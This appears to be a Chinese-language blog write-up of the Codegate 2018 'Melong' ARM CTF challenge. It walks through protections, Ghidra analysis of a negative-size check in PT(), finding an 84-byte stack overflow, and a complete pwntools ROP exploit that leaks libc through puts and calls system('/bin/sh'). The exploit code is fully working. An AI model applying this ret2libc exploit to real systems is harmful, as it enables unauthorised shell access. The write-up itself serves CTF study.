ctf-wiki ARM ROP Codegate2018_Melong題解

寫在前面

ctf-wiki關(guān)于arm pwn的arm - ROP中的例題是Codegate2018_Melong,但在網(wǎng)上一直沒找到write up,這里跟著官方解給出的exp調(diào)試記錄。

確定保護(hù)

$ file ./melong
./melong: ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), dynamically linked, interpreter /lib/ld-, for GNU/Linux 3.2.0, BuildID[sha1]=2c55e75a072020303e7c802d32a5b82432f329e9, not stripped
$ checksec ./melong
[*] '/home/giantbranch/ctf_wiki_study/ctf-challenges/pwn/arm/Codegate2018_Melong/melong'
    Arch:     arm-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x10000)

猜測(cè)是棧溢出題目,保護(hù)機(jī)制帶隨機(jī)部分隨機(jī)化,Partial RELRO

靜態(tài)分析

首先用命令$ qemu-arm -L ./ ./melong運(yùn)行程序,程序結(jié)果如下圖所示:

圖片.png

典型菜單題,運(yùn)行之后發(fā)現(xiàn)首先需要選擇菜單1,計(jì)算bmi指數(shù),之后才能選擇其他功能。經(jīng)測(cè)試程序的大規(guī)模文本輸入點(diǎn)在選項(xiàng)4中,但是需要選項(xiàng)3符合一定條件才行。

You are underweight !!
1. Check your bmi
2. Exercise
3. Register personal training
4. Write daily record
5. Have some health menu
6. Out of the gym

Type the number:3
Let's start personal training
How long do you want to take personal training?
10
Check your bmi again!!
1. Check your bmi
2. Exercise
3. Register personal training
4. Write daily record
5. Have some health menu
6. Out of the gym

Type the number:4
you should take personal training first!!

將程序拖到ghidra進(jìn)行靜態(tài)分析,查看主函數(shù)中case 3和case 4中的情況。


圖片.png

可以看到若想到達(dá)case 4中的write_diary函數(shù),首先需要變量local_18[0]!=0才行。
注意到case 3中:local_18[0]=PT(),進(jìn)一步查看函數(shù)PT()中的內(nèi)容,偽代碼如下圖所示:

size_t PT(void)

{
  size_t local_14;
  void *local_10;
  int local_c;
  
  puts("Let\'s start personal training");
  puts("How long do you want to take personal training?");
  __isoc99_scanf(&DAT_00011e24,&local_14);
  local_10 = malloc(local_14);
  if (local_10 == exc2) {
    puts("Okay, start to exercise!");
    local_c = 0;
    while (local_c < (int)local_14) {
      puts("you are getting healthy..");
      sleep(1);
      local_c = local_c + 1;
    }
    free(local_10);
  }
  else {
    puts("Check your bmi again!!");
    free(local_10);
    local_14 = 0;
  }
  return local_14;
}

這里沒明白local_10==exc2中的exc2是什么意思。但是經(jīng)測(cè)試輸入-1時(shí),在菜單4中可以寫入,猜測(cè)這里是可能的溢出點(diǎn)。

Type the number:3
Let's start personal training
How long do you want to take personal training?
-1
Okay, start to exercise!
1. Check your bmi
2. Exercise
3. Register personal training
4. Write daily record
5. Have some health menu
6. Out of the gym

Type the number:4
dddddddd
you wrote dddddddd

嘗試輸入長(zhǎng)字符:

Type the number:4
ddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
you wrote ddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd

1. Check your bmi
2. Exercise
3. Register personal training
4. Write daily record
5. Have some health menu
6. Out of the gym

Type the number:6
See you again :)
qemu: uncaught target signal 11 (Segmentation fault) - core dumped
Segmentation fault (core dumped)

進(jìn)入gdb調(diào)試,開啟兩個(gè)termial
qemu-arm -L ./ -g 2222 ./melong

> gdb-multiarch ./melong
> target remote :2222

掛載調(diào)試程序崩潰時(shí)的場(chǎng)景,結(jié)果如下圖所示:



顯然,存在棧溢出。
評(píng)估棧溢出的長(zhǎng)度,利用pwntools中的cyclic工具,偏移長(zhǎng)度84


看到函數(shù)表中有puts函數(shù),可以上pwn的傳統(tǒng)工藝:
棧溢出==>puts(elf.got['function_name'])==>計(jì)算libc基址==>跳回main==>跳轉(zhuǎn)到system("/bin/sh")

arm32利用gadget:pop {r0,pc}
利用ROPgadget尋找地址:

> ROPgadget --binary ./melong --only "pop"
Gadgets information
============================================================
0x000106bc : pop {fp, pc}
0x00011bbc : pop {r0, pc}
0x00010460 : pop {r3, pc}
0x000109cc : pop {r4, fp, pc}
0x000105e4 : pop {r4, pc}
0x00011408 : pop {r4, r5, pc}
0x0001173c : pop {r4, r5, r6, pc}
0x00011d28 : pop {r4, r5, r6, r7, r8, sb, sl, pc}

Unique gadgets found: 8

完成EXP如下所示:

from pwn import *
from time import sleep
import sys
context.binary = "./melong"

if sys.argv[1] == "r":
    io = remote("localhost", 9999)
elif sys.argv[1] == "l":
    io = process(["qemu-arm", "-L", "./", "./melong"])
elif sys.argv[1] == "g":
    io = process(["qemu-arm", "-g", "1239", "-L", "./", "./melong"])

elf = ELF("./melong", checksec = False)
libc = ELF("./lib/libc.so.6", checksec = False)
# context.log_level = "debug"

def check(height,weight):
    io.sendlineafter("number:","1")
    io.sendlineafter(" : ",str(height))
    io.sendlineafter(" : ",str(weight))
def register():
    io.sendlineafter("number:","3")
    io.sendlineafter(" training?\n","-1\n")

def write_record(record):
    io.sendlineafter("number:","4")
    io.send(record)
    

def log_out():
    io.sendlineafter("number:","6")

pop_r0 = 0x11bbc
check(1.82,600)
register()
payload=cyclic(100)
log_out()

payload=cyclic(84)+p32(pop_r0)+p32(elf.got['printf'])+p32(elf.plt['puts'])+p32(0x110cc)*8#
write_record(payload)
log_out()
io.recvuntil("again :)\n")
libc_address=u32(io.recvn(4))-libc.sym['printf']
success("libc_address->{:#x}".format(libc_address))
libc.address=libc_address
check(1.9,30)
register()
print("libc.search type is ",libc.search("/bin/sh"))
print(hex(libc.sym["system"]))
print(hex(next(libc.search("/bin/sh"))))
payload=cyclic(0x54)+p32(pop_r0)+p32(next(libc.search("/bin/sh")))+p32(libc.sym["system"])
write_record(payload)
log_out()
io.interactive()
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

友情鏈接更多精彩內(nèi)容